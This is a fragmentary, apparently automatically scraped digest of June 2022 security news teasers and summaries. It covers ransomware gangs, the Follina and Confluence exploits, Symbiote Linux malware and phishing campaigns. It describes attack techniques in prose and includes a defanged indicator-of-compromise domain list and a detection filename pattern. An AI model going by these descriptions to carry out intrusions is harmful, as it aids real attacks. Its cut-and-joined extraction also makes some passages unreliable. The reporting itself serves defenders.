Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, Sophos Firewall) Volexity researchers discovered that the zero-day vulnerability, tracked as CVE-2022-1040, in Sophos Firewall was exploited by Chinese threat actors to compromise a company and cloud-hosted web servers it was operating. "Autosummary:
"Autosummary:
Versioning setting on document lists (Microsoft) With a file version limit set to “1,” when the attacker encrypts or edits the file twice, the original document will no longer be available through OneDrive and cannot be restored. "Autosummary:
"Researchers at antivirus firm Dr. Web discovered malware in the Google Play Store that was downloaded two million times. An investigation conducted by the antivirus firm Dr. Web in May resulted in the discovery of multiple adware and information-stealing malware on the official Google Play Store. However, the experts warn that info-stealing Trojans are the […]
The post Malicious apps continue to spread through the Google Play Store appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, malware) "Autosummary:
"Autosummary:
To mitigate such attacks, it"s recommended to enforce a strong password policy, mandate multi-factor authentication (MFA), prevent large-scale data downloads to unmanaged devices, and maintain periodic external backups of cloud files with sensitive data. "Autosummary:
Network-based scanning explained Network-based internal vulnerability scanning is the more traditional approach, running internal network scans on a box known as a scanning "appliance" that sits on your infrastructure (or, more recently, on a Virtual Machine in your internal cloud). The different types of internal scanner Generally, when it comes to identifying and fixing vulnerabilities on your internal network, there are two competing (but not mutually exclusive) approaches: network-based internal vulnerability scanning and agent-based internal vulnerability scanning. In environments where IP addresses are assigned dynamically, though (usually, end-user environments are configured like this to support laptops, desktops, and other devices), this can become a problem. Agent-based vulnerability scanning, on the other hand, spreads the load to individual machines, meaning there"s less of a bottleneck on the network, and results can be gained much more quickly. For this reason, designing a network-based scanning architecture relies on accurate network documentation and understanding, which is often a challenge, even for well-resourced organizations.However, with remote working now the norm in most if not all workplaces, it feels a lot more like agent-based scanning is a must, while network-based scanning is an optional extra. Deploying network-based appliances on the other hand requires analysis of network visibility, i.e. from "this" position in the network, can we "see" everything else in the network, so the scanner can scan everything? "Autosummary:
“The goal,” in the end, was “to steal their personal information, passport scans, and steal access to their mail accounts.” Fake Emails from Legit Addresses One of the targets, according to Check Point, is Tzipi Livni, Israel’s former foreign minister, minister of justice and vice prime minister. "Autosummary:
The New York Times quoted one nurse as saying, “To look someone in the eye, and tell them they cannot have their life-extending or lifesaving treatment, it was horrible, and totally heart-wrenching.”The complexities of the environment, with connected medical devices, multiple locations, and legacy systems, create many challenges. Rethinking the Importance of Cybersecurity ECRI, a nonprofit focused on patient safety, named cybersecurity attacks the top health technology hazard (PDF) for 2022. "Autosummary:
Then, “in a likely automated fashion,” the authors of the report explained, “the threat actor would login to that account, and send out the link to the user’s Friends via Facebook Messenger.” Even if Facebook caught on to and blocked any one of these illegitimate domains, “it was trivial (and based on the speed we observed, likely automated) to spin up a new link using the same service, with a new unique ID. "Autosummary:
"ALPHV/BlackCat ransomware group began publishing victims’ data on the clear web to increase the pressure on them and force them to pay the ransom. ALPHV/BlackCat ransomware group has adopted a new strategy to force victims into paying the ransom, the gang began publishing victims’ data on the clear web to increase the pressure. Publishing data online will […]
The post ALPHV/BlackCat ransomware gang starts publishing victims’ data on the clear web appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, ransomware) "Autosummary:
Creating VPN user accounts and associating certificate pairs on the firewall for legitimate remote network access Writing “pre_install.sh” to ‘/conf/certificate/’ "pre_install.sh" runs a malicious command to download a binary, execute it, then delete it from the disk The researchers say that gaining access to Sophos Firewall was the first step of the attack, allowing the adversary to perform man-in-the-middle (MitM) activity by way of modifying DNS responses for specific websites managed by the victim company. "Autosummary:
VNC allows the operators to navigate between screens, scroll, take screenshots, copy and paste content, swipe, perform long presses, and more. "Autosummary:
Ninja Forms force-update installs Forced updates used to patch critical bugs This matches previous instances when Automattic, the company behind the WordPress content management system, used forced updates to quickly patch critical security flaws used by hundreds of thousands or millions of sites. "The BlackCat ransomware gang is targeting unpatched Exchange servers to compromise target networks, Microsoft warns. Microsoft researchers have observed BlackCat ransomware gang targeting unpatched Exchange servers to compromise organizations worldwide. The compromise of Exchange servers allows threat actors to access the target networks, perform internal reconnaissance and lateral movement activities, and steal sensitive documents before encrypting them. “For example, […]
The post BlackCat Ransomware affiliates target unpatched Microsoft Exchange servers appeared first on Security Affairs.
"Autosummary:
In addition, at least two known affiliates are now adopting BlackCat: DEV-0237 (known for previously deploying Ryuk, Conti, and Hive) and DEV-0504 (previously deployed Ryuk, REvil, BlackMatter, and Conti).” “For discovered devices, the attackers attempted to navigate to various network shares and used the Remote Desktop client (mstsc.exe) to sign into these devices, once again using the compromised account credentials.” continues the analysis. "Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022. Will it survive the ever-tightening controls on macro-enabled documents?
The post How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security appeared first on WeLiveSecurity
"Autosummary:
Recognizing this potential abuse of macros, during the heyday of Word 97 Microsoft introduced the first built-in security feature in Word that blocked Visual Basic for Applications (VBA) macros from running: This feature continued to be developed in later versions of Office, now probably most familiar via the yellow Message Bar with the “Enable Content” button introduced in Office 2010: Since then, two clicks have been typically required to enable macros: first, clicking on “Enable Editing”, which removes the document from Protected View, a security feature in place since Office 2010 that provides a read-only, sandboxed environment; second, clicking on “Enable Content”, which allows the macros to run.Specifically, Guildma stored all of its malicious modules, including a couple of tools from Nirsoft for extracting saved credentials from popular email clients and web browsers, as the streams of the single desktop.ini file: desktop.ini:nauwuygiaa.jpg (MailPassView) (MailPassView) desktop.ini:nauwuygiab.jpg (BrowserPassView)… For targeting air-gapped networks, malicious actors have used streams to hide malicious components within otherwise innocuous-looking files on USB drives. When double-clicked, a shortcut file can launch a target resource, in this case, a PowerShell script that downloaded and executed Emotet: Most detections were in Japan (28%), Italy (16%), and Mexico (11%). In an earlier test campaign between April 4th and April 19th, the Emotet operators attracted victims to a ZIP archive, stored on OneDrive, containing Microsoft Excel Add-in (XLL) files, which are used to add custom functions to Excel.Identifier is a well-known stream name that modern browsers and some other applications automatically add or propagate to files to indicate their zone: the internet, the intranet, the trusted zone, the restricted zone, or the local machine. "With global cyber crime costs expected to reach $10.5 trillion annually by 2025, it comes as little surprise that the risk of attack is companies’ biggest concern globally. To help businesses uncover and fix the vulnerabilities and misconfigurations affecting their systems, there is an (over)abundance of solutions available. But beware, they may not give you a full and continuous view of your weaknesses if used in isolation. With huge financial gains to be had from … More
The post Mind the gap: How to ensure your vulnerability detection methods are up to scratch appeared first on Help Net Security.
"Autosummary:
Fortunately, some solutions – such as Intruder Vanguard – take a faster, more proactive approach, finding the proof-of-concept exploit, breaking it down, and then checking all its customers – often before the scanning vendors have started their checks. To avoid this, you need a solution which takes into account your specific environment i.e. the types of systems you have deployed, the configuration of these systems, the data stored within them, and the mitigating controls you have in place. "The APWG’s Phishing Activity Trends Report reveals that in the first quarter of 2022 there were 1,025,968 total phishing attacks—the worst quarter for phishing observed to date. This quarter was the first time the three-month total has exceeded one million. There were 384,291 attacks in March 2022, which was a record monthly total. In the first quarter of 2022, OpSec Security reported that phishing attacks against the financial sector, which includes banks, remained the largest … More
The post Phishing reaches all-time high in early 2022 appeared first on Help Net Security.
"Autosummary:
In the first quarter of 2022, OpSec Security reported that phishing attacks against the financial sector, which includes banks, remained the largest set of attacks, accounting for 23.6 percent of all phishing. "Autosummary:
Besides CVE-2022-30190, the cumulative security update also resolves several remote code execution flaws in Windows Network File System (CVE-2022-30136), Windows Hyper-V (CVE-2022-30163), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC Video Extensions, and Azure RTOS GUIX Studio. "We take a look at the latest healthcare breach, an email compromise of a healthcare employee and explore the fallout.
The post Email compromise leads to healthcare data breach at Kaiser Permanente appeared first on Malwarebytes Labs.
"Autosummary:
Data exposed includes: First and last name of patients Dates of service Medical records Lab test result information The attacker did not have access to credit card details and social security numbers. Healthcare attacks: big business for fraudsters This certainly isn’t the only healthcare breach in the news, with fresh attacks and even multiple breaches at some unfortunate organisations. "The Alphv (aka BlackCat) ransomware group is trying out a new tactic to push companies to pay for their post-breach silence: a clearnet (public Internet) website with sensitive data about the employees and customers stolen from a victim organization. Alphv has created a @haveibeenpwned-like site on the clearnet where the employees and customers of a victim organization can check if their personal info. has been compromised. 1/3 pic.twitter.com/95BWwRPvhD — Brett Callow (@BrettCallow) June 14, 2022 … More
The post Ransomware gang publishes stolen victim data on the public Internet appeared first on Help Net Security.
"Autosummary:
For employees, these can include information such as email and phone number, Social Security number, date of birth and other sensitive information contained in tax forms, results of medical tests and background checks, and so on. "Autosummary:
"Autosummary:
"Autosummary:
HTTP request (above) and message sent to server (below) (SonarSource) “Usually, Mail clients such as Thunderbird, Microsoft Outlook, the macOS Mail app, and Smartphone mail apps store the credentials that the user used to connect to their IMAP server on disk,” explains SonarSource in the report, highlighting that the exploit doesn’t require any user interaction. "Symbiote, the latest malware to hit Linux users, is a parasite more than anything. Protect against this banking credential stealer now!
The post Stealthy Symbiote Linux malware is after financial institutions appeared first on Malwarebytes Labs.
"Autosummary:
Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.” Symbiote’s evasion techniques (Source: Blackberry Threat Vector Blog) Symbiote: the hows and whys of its ways Once all processes have been infected, the Linux machine is as good as being infected. "Autosummary:
XMRig configuration (Sophos) XMRig mining attributed to Blue Mockingbird (Sophos) Notably, this was the main goal of the threat actor’s 2020 campaign, so not much has changed in the whole attack chain, techniques, and goals. "Hitachi Vantara and Enterprise Strategy Group (ESG) announced the findings of a survey of more than 600 IT and cybersecurity professionals, which revealed that 79% respondents reported a ransomware attack at their company within the last year. More troubling for organizations is the degree with which these attacks are successful. The survey found that 73% report that they have been financially or operationally impacted by these attacks. As noted in the report, “Every lost bit … More
The post Why do organizations need to prioritize ransomware preparedness? appeared first on Help Net Security.
"Autosummary:
"Researchers at MIT have published details about an attack that uses a flaw in the M1 security feature pointer authentication codes.
The post Don’t panic! “Unpatchable” Mac vulnerability discovered appeared first on Malwarebytes Labs.
"Autosummary:
Apple has implemented pointer authentication on all of its custom ARM-based silicon so far, including the M1, M1 Pro and M1 Max, and a number of other chip manufacturers, including Qualcomm and Samsung, have either announced or expect to ship new processors supporting the PAC security feature.The Apple M1 series of ARM-based system-on-a-chip (SoC) works as a central processing unit (CPU) and graphics processing unit (GPU) for Apple’s Macintosh desktops and notebooks, as well as the iPad Pro and iPad Air tablets. "If you Google “How often should I do penetration testing?”, the first answer that pops up is “once a year.” Indeed, even industry-leading standards like PCI-DSS dictate that external penetration testing be conducted annually (or after significant changes to infrastructure or applications), while internal penetration testing takes place annually, with segmentation testing occurring every six months. Yet today’s cybercriminals don’t work on annual schedules. They don’t wait until pen testing time rolls around and the … More
The post Once is never enough: The need for continuous penetration testing appeared first on Help Net Security.
"Autosummary:
Indeed, even industry-leading standards like PCI-DSS dictate that external penetration testing be conducted annually (or after significant changes to infrastructure or applications), while internal penetration testing takes place annually, with segmentation testing occurring every six months.When a new API is connected, a new server added, or a new version released – that snapshot is no longer valid, even if the next round of pen testing is a year away. "Autosummary:
"Autosummary:
"Microsoft has warned of APT groups and ransomware authors exploiting the now patched Confluence vulnerability. We take a look at the dangers.
The post “Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft appeared first on Malwarebytes Labs.
"Autosummary:
We urge customers to upgrade to the latest version or apply recommended mitigations: https://t.co/C3CykQgrOJ — Microsoft Security Intelligence (@MsftSecIntel) June 11, 2022 Microsoft continues: In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware.On June 3, Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability. "In this post, we’ll give you a step-by-step on how to complete an Inventory and vulnerability scan in Malwarebytes Vulnerability Assessment for OneView.
The post Introducing Malwarebytes Vulnerability Assessment for OneView: How to check for Common Vulnerabilities and Exposures (CVEs) appeared first on Malwarebytes Labs.
"Autosummary:
Here are some key benefits: Automatically identify vulnerabilities via scheduled or manual scans Deliver key insights and remediation steps for vulnerabilities; prioritized by severity level Stay informed with customizable notifications when new vulnerabilities are discovered Detailed vulnerability dashboards for a high-level view or all your customers In this post, we’ll give you a step-by-step on how to complete an inventory and vulnerability scan in Malwarebytes Vulnerability Assessment for OneView. "Autosummary:
"Autosummary:
“Whether it is the use of stolen credentials, phishing, misuse, or simply an error, people continue to play a very large role in incidents and breaches alike,” researchers wrote in the report. "Autosummary:
Once Symbiote has infected all the running processes, a threat actor can engage in various nefarious activity, including rootkit functionality, the ability to harvest credentials, and remote access capability, Kennedy said. To gain remote access to an infected machine, the malware hooks a few Linux Pluggable Authentication Module (PAM) functions, which allows it to authenticate to the machine with any service that uses PAM—including remote services such as Secure Shell (SSH), Kennedy said. "Autosummary:
Windows 11 KB5014697 cumulative update Windows 11 users can install today"s update by going to Start > Settings > Windows Update and clicking on "Check for Updates." "Autosummary:
Attackers who successfully exploit this zero-day can execute arbitrary code with the privileges of the calling app to install programs, view, change, or delete data, and even create new Windows accounts as allowed by the compromised user"s rights. "Autosummary:
"Instagram users" IDs are being stolen in a scam aimed at luring their friends into signing up for expensive subscription services.
The post Instagram scam steals your selfies to trick your friends appeared first on Malwarebytes Labs.
"Autosummary:
A Wix “burner” website using a stolen profile picture Click on a link (any link at all) and you’d end up at a different domain, at an unbranded “age verification” page hungry for an email, username, and password, so you could “JOIN NOW”. Of course, this wasn’t a “secret account”, there were no “FREE LIVE SHOWS”, and there was no “private content”. "Autosummary:
A threat actor, however, can get around these restrictions by exploiting a technique called response smuggling, which entails "smuggling" unauthorized HTTP responses that abuse the CRLF injection flaw to forward IMAP traffic to a rogue server, thereby stealing credentials from users without prior knowledge of their email addresses. "Autosummary:
Among the many threats that managed to infiltrate the Google Play Store, the following five are still available: PIP Pic Camera Photo Editor – 1 million downloads, malware masquerading as image-editing software, but which steals the Facebook account credentials of its users. "Autosummary:
While the customer guest data only contains names, arrival date, and stay costs, the employee data includes extremely sensitive information, such as names, Social Security Numbers, date of birth, phone numbers, and email addresses. "Autosummary:
"Autosummary:
" Unit 42 said it linked the likely Russian developer behind HelloXD — who goes by the online aliases x4k, L4ckyguy, unKn0wn, unk0w, _unkn0wn, and x4kme — to further malicious activities such as selling proof-of-concept (PoC) exploits and custom Kali Linux distributions by piecing together the actor"s digital trail. "Autosummary:
"Autosummary:
"Experts observed the HelloXD ransomware deploying a backdoor to facilitate persistent remote access to infected hosts. The HelloXD ransomware first appeared in the threat landscape on November 30, 2021, it borrows the code from Babuk ransomware, which is available in Russian-speaking hacking forums since September 2021. Unlike other ransomware operations, this ransomware gang doesn’t use a […]
The post HelloXD Ransomware operators install MicroBackdoor on target systems appeared first on Security Affairs.
"Autosummary:
The analysis of the MicroBackdoor sample revealed an embedded IP address in the configuration, the IP belongs to a threat actor that is likely the developer: x4k (aka L4ckyguy, unKn0wn, unk0w, _unkn0wn, and x4kme). "Autosummary:
Two weeks after the initial compromise using an unpatched Exchange server as an entry vector, the threat actor deployed BlackCat ransomware payloads across the network via PsExec. "While the common entry vectors for these threat actors include remote desktop applications and compromised credentials, we also saw a threat actor leverage Exchange server vulnerabilities to gain target network access," the Microsoft 365 Defender Threat Intelligence Team said. "Tech support scams follow a simple business model that has not changed much over the years. After all, why change a recipe that continues to yield large profits. We see countless such campaigns and block them indiscriminately to protect our customers from being defrauded by a fraudulent tech support agent over the phone. Every now...
The post Taking down the IP2Scam tech support campaign appeared first on Malwarebytes Labs.
"Autosummary:
Indicators of Compromise Cloaking domains newsjump[.]xyz newsmaven[.]xyz newsdeals[.]xyz xposednews[.]xyz taclenews[.]xyz crypcoinsnews[.]xyz chapternews[.]xyz kathnews[.]xyz tomsguides[.]xyz npost[.]xyz maanews[.]xyz tomguide[.]xyz exposednews[.]xyz hrmaclenews[.]xyz bongaecams[.]xyz clarkdeals[.]xyz bongmecams[.]xyz bongocams[.]xyz eronews[.]xyz Browlock IPs by ASN and timestamp DigitalOcean Choopa Malvertising flow As with many other malvertising campaigns, the scammers prey on visitors to adult websites and perform a very simple cloaking technique to hijack traffic and redirect it to their browser locker. "Ukraine’s Computer Emergency Response Team (CERT) warns that the Russia-linked Sandworm APT group may exploit the Follina RCE vulnerability. Ukraine’s Computer Emergency Response Team (CERT) is warning that the Russia-linked Sandworm APT may be exploiting the recently discovered Follina RCE. The issue, tracked as CVE-2022-30190, impacts the Microsoft Windows Support Diagnostic Tool (MSDT). Nation-state actors […]
The post Russia-linked APT targets Ukraine by exploiting the Follina RCE vulnerability appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RSA Conference 2022 coverage Check out our microsite for related news, photos, product releases, and more. Researchers unearth highly evasive “parasitic” Linux malware Security researchers at Intezer and BlackBerry have documented Symbiote, a wholly unique, multi-purpose piece of Linux malware that is nearly impossible to detect. Apple unveils passkeys for passwordless authentication to apps and websites At WWDC 2022, Apple … More
The post Week in review: Follina exploit delivers Qbot malware, Patch Tuesday forecast, RSAC 2022 appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: June 10, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Acronis, Code42, Cynet, Elastic, Living Security, Lumu, NetWitness, Qualys, SafeBreach, and Swimlane. Apple unveils passkeys for passwordless authentication to apps and websites At WWDC 2022, Apple has announced and previewed iOS 16 and iPad OS 16, macOS 13 (aka macOS Ventura), watchOS 9, their new M2 chips, new MacBook Air and Pro, as well as new tools, technologies, and APIs for developers focusing on Apple’s platforms. "Ransomware gangs are actively exploiting CVE-2022-26134 remote code execution (RCE) flaw in Atlassian Confluence Server and Data Center. Multiple ransomware groups are actively exploiting the recently disclosed remote code execution (RCE) vulnerability, tracked as CVE-2022-26134, affecting Atlassian Confluence Server and Data Center. Proof-of-concept exploits for the CVE-2022-26134 vulnerability have been released online, Bleeping Computer reported that starting from […]
The post Ransomware gangs are exploiting CVE-2022-26134 RCE in Atlassian Confluence servers appeared first on Security Affairs.
"Autosummary:
Proof-of-concept exploits for the CVE-2022-26134 vulnerability have been released online, Bleeping Computer reported that starting from Friday afternoon, a proof-of-concept exploit for this issue was publicly shared. "Autosummary:
Samples of X4KME online presence (Unit 42) Additionally, the same hacker has posted on forums to offer proof-of-concept (PoC) exploits, crypter services, custom Kali Linux distributions, and malware-hosting and distribution services. "Autosummary:
Widely exploited in the wild Since cybersecurity firm Volexity disclosed CVE-2022-26134 as an actively exploited zero-day bug last week, CISA has also ordered federal agencies to mitigate the flaw by blocking all internet traffic to Confluence servers on their networks. "Autosummary:
At the time Microsoft said that it would not be fixing the bug as it did not view it as satisfying its vulnerability criteria, and "DogWalk" remained largely forgotten until last week when another flaw in MSDT that was being exploited in the wild - "Follina" - made the headlines of IT media outlets. "Security researchers at Intezer and BlackBerry have documented Symbiote, a wholly unique, multi-purpose piece of Linux malware that is nearly impossible to detect. “What makes Symbiote different from other Linux malware that we usually come across, is that it needs to infect other running processes to inflict damage on infected machines. Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded … More
The post Researchers unearth highly evasive “parasitic” Linux malware appeared first on Help Net Security.
"Autosummary:
"The Vice Society group has claimed responsibility for the ransomware attack that hit the Italian city of Palermo forcing the IT admins to shut down its infrastructure. The Vice Society ransomware group has claimed responsibility for the recent cyber attack that hit the city of Palermo in the South of Italy. In response to the […]
The post Vice Society ransomware gang adds the Italian City of Palermo to its data leak site appeared first on Security Affairs.
"Autosummary:
Sispi (Palermo Innovazione System), which is the municipal company that is responsible for the technical management of the municipal IT and telematic system of the Municipality of Palermo, confirmed the ransomware attack a few days later, but at this time it doesn’t confirm the data breach. "The Cuba ransomware operators are back and employed a new version of its malware in recent attacks. Cuba ransomware has been active since at least January 2020. Its operators have a data leak site, where they post exfiltrated data from their victims who refused to pay the ransom. The ransomware encrypts files on the targeted systems […]
The post Experts spotted a new variant of the Cuba Ransomware with optimized infection techniques appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Atlassian has warned its customers that the only mitigation for the critical flaw is to apply the security updates, which have become available in versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1. "Threat actors are exploiting the recently disclosed CVE-2022-26134 RCE in Atlassian Confluence servers to deploy cryptocurrency miners. CheckPoint researchers have observed threat actors exploiting the recently disclosed CVE-2022-26134 remote code execution vulnerability in Atlassian Confluence servers to deploy cryptocurrency miners. Last week, Atlassian warned of a critical unpatched remote code execution vulnerability affecting all Confluence […]
The post Threat actors exploit recently disclosed Atlassian Confluence flaw in cryptomining campaign appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @VK_Intel, @demonslay335, @DanielGallagher, @Ionut_Ilascu, @LawrenceAbrams, @fwosar, @malwrhunterteam, @jorntvdw, @malwareforme, @FourOctets, @serghei, @PolarToffee, @Seifreed, @struppigel, @BleepinComputer, @TrendMicro, @uptycs, @NCCGroupInfosec, @Intel_by_KELA, @y_advintel, @Avast, @BrettCallow, @ValeryMarchive, and @pcrisk. "We take a look at a large-scale Facebook phishing operation, reputedly generating millions in ill-gotten gains.
The post Facebook users targeted in massive phishing campaign appeared first on Malwarebytes Labs.
"Autosummary:
Posted: June 9, 2022 by We take a look at a large-scale Facebook phishing operation, reputedly generating millions in ill-gotten gains.The campaign, which first shows signs of life back in September 2021, has generated millions of page views and ad referral revenue “estimated to be millions of USD at this scale of operation”. What is clear, is that without dedicated resources and probable law enforcement involvement, something like this will never fully go away. "BlackBasta, a newish ransomware group that is somehow linked to Conti, has a new Linux variant of its malware that targets VMware ESXi virtual machines.
The post BlackBasta is the latest ransomware to target ESXi virtual machines on Linux appeared first on Malwarebytes Labs.
"Autosummary:
(Source: Uptycs) A section of the ransom note reads: Your data are stolen and encrypted The data will be published on TOR website if you do not pay the ransom You can contact us and decrypt one file for free on this TOR site (you should download and install TOR browser first https://torproject.org) {URL redacted} Protect your Linux ESXi VM against ransomware attacks Vincent Bariteau, Threat Intelligence Support Analyst at Malwarebytes, recommends organizations follow these best practices to protect their Linux servers against ransomware attacks if they’re using ESXi VM: Harden the SSH (Secure Shell) access to allow only a specific user to use it. "Autosummary:
"Autosummary:
Spawning a root shell on the host (BlackBerry) The malware"s targets are mostly entities engaging in the financial sector in Latin America, impersonating Brazilian banks, the country"s Federal police, etc. "Since the malware operates as a user-land level rootkit, detecting an infection may be difficult," the researchers concluded. "Autosummary:
"Exposed version control repositories, leaked secrets in public code repositories, a subdomain vulnerable to takover, exposed Amazon S3 buckets, and Microsoft Exchange Server servers vulnerable to CVE-2021-42321 exploitation are the most common exploit paths medium to large enterprises left open for attackers in Q1 2022, according to Mandiant. Opening doors for attackers The firm has based the list on the most common issues discovered by continuously scanning the external attack surface of its customers from … More
The post The most common exploit paths enterprises leave open for attackers appeared first on Help Net Security.
"Autosummary:
"In 2022, the most prevalent ransomware trends include double-extortion, supply chain attacks, ransomware-as-a-service, ransomware rebranding, and geo-political incited ransomware attacks. “Modern ransomware attacks require a single successful asset compromise to gain initial entry, move laterally, and breach the entire environment, making legacy VPN and flat networks extremely vulnerable,” said Deepen Desai, CISO of Zscaler. “Attackers are finding success exploiting weaknesses across businesses’ supply chains as well as critical vulnerabilities like Log4Shell, PrintNightmare, and others. And … More
The post Ransomware attacks have increased by 80% year-over-year appeared first on Help Net Security.
"Autosummary:
"At RSA Conference 2022, Malwarebytes announced the expansion of its Nebula platform with a new DNS Filtering module available for Windows on June 14 and for Mac in July. Malwarebytes DNS Filtering is powered by Cloudflare‘s zero trust platform to deliver a flexible and comprehensive zero trust solution for Nebula users. Malwarebytes DNS Filtering module for Nebula helps block access to malicious websites and limit threats introduced by suspicious content. “It’s challenging for organizations today … More
The post Malwarebytes DNS Filtering helps IT and security teams block access to malicious websites appeared first on Help Net Security.
"Autosummary:
Now, IT and security teams can block whole categories of sites, take advantage of an extensive database of pre-defined scores on known, suspicious web domains, protect core web-based applications and manage specific site restrictions, removing the headache from overseeing site access.” "Autosummary:
"Here are four big threats to cloud storage security that SMBs should be ready to address to help prevent cloud data breaches.
The post Cloud data breaches: 4 biggest threats to cloud storage security appeared first on Malwarebytes Labs.
"Autosummary:
Weak IAM policies Each user in a cloud environment has their own roles and permissions governing the access they get to certain parts of the cloud, and because cloud workloads are accessed online, all hackers need are your credentials to get the “keys to the kingdom”. Small and medium businesses (SMBs) are also reaping the many benefits that the cloud offers over on-premise software, especially the lowered IT costs, increased scalability, and large storage capacity that come along with it. "Autosummary:
Files encrypted by the Chaos ransomware variant Source: BleepingComputer What makes the new WannaFriendMe ransomware stand out is that instead of demanding cryptocurrency as a ransom payment, it requires victims to purchase a decryptor from Roblox"s Game Pass store using Robux, as can be read in the ransom note below: ----- "Researchers uncovered a high stealth Linux malware, dubbed Symbiote, that could be used to backdoor infected systems. Joint research conducted by security firms Intezer and BlackBerry uncovered a new Linux threat dubbed Symbiote. The name comes from the concept of symbiote which is an organism that lives in symbiosis with another organism, exactly like this implant does with […]
The post Symbiote, a nearly-impossible-to-detect Linux malware appeared first on Security Affairs.
"Autosummary:
“Once the malware has infected a machine, it hides itself and any other malware used by the threat actor, making infections very hard to detect.“Network telemetry can be used to detect anomalous DNS requests, and security tools such as antivirus and endpoint detection and response (EDR) should be statically linked to ensure they are not “infected” by userland rootkits.” "Ping Identity, Yubico, and EntryPoint partnered on a joint solution that enables phishing-resistant Derived FIDO2 Credentials (DFCs) along with identity proofing and centralized identity management. “Phishing-resistant MFA is an immediate priority for enterprises and is now a specific requirement for the U.S. government,” said Andre Durand, CEO and founder of Ping Identity. “By incorporating enterprise-grade federation and access controls into this joint solution, organizations can easily use Derived FIDO2 Credentials to enhance the security of … More
The post Ping Identity, Yubico, and EntryPoint bring zero trust to FIDO2 authenticators for the US Federal Government appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Files encrypted by the Chaos ransomware variant Source: BleepingComputer What makes the new WannaFriendMe ransomware stand out is that instead of demanding cryptocurrency as a ransom payment, it requires victims to purchase a decryptor from Roblox"s Game Pass store using Robux, as can be read in the ransom note below: ----- "More than a week has passed since Microsoft acknowledged the existence of the “Follina” vulnerability (CVE-2022-30190), after reports of it being exploited in the wild began to crop up here and there. Since then, other state-backed threat actors have started exploiting it, but now one of the most active Qbot (QakBot) malware affiliates has also been spotted leveraging Follina. Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute … More
The post Qbot – known channel for ransomware – delivered via phishing and Follina exploit appeared first on Help Net Security.
"Autosummary:
Match following filename pattern [0-9]{8}\_[0-9]{6}.htmlhttps://t.co/xaKa60O3hW pic.twitter.com/L2MQ8vMfyQ — Ankit Anubhav (@ankit_anubhav) June 8, 2022 Follina exploitation leads to Qbot installation Setting aside for a moment the fact that Qbot is an effective information stealer and backdoor in its own right, this latest development should worry most organizations, as a variety of Ransomware-as-a-Service (RaaS) operators use Qbot to secure a foothold into corporate networks before deploying ransomware. "Autosummary:
“The fact that ransomware gangs strike so quickly a second and third time isn’t surprising, because they will try to profit in any possible way,” wrote Bill Keeler, senior director of global public relations at Cybereason, in a written exchange with Threatpost. "Autosummary:
Black Basta, a ransomware group that emerged in April, leveraged Qbot, (a.k.a. Quakbot), to move laterally on a compromised network, researchers from security consulting firm NCC Group wrote in a blog post published this week. Once it’s deployed, Black Basta ransomware itself, like many ransomware variants, doesn’t encrypt the entire file, researchers found. "Black Basta ransomware gang implemented a new feature to encrypt VMware ESXi virtual machines (VMs) running on Linux servers. The Black Basta ransomware gang now supports encryption of VMware ESXi virtual machines (VMs) running on Linux servers. Researchers from Uptycs first reported the discovery of the new Black Basta ransomware variant that supports encryption of […]
The post Black Basta ransomware now supports encrypting VMware ESXi servers appeared first on Security Affairs.
"Autosummary:
"Autosummary:
This clipboard hijacking feature works with various cryptocurrency addresses, including those for Bitcoin, Ethereum, Cardano, Terra, Nano, Ronin, and Bitcoin Cash addresses. "In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.
The post 5 Linux malware families SMBs should protect themselves against appeared first on Malwarebytes Labs.
"Autosummary:
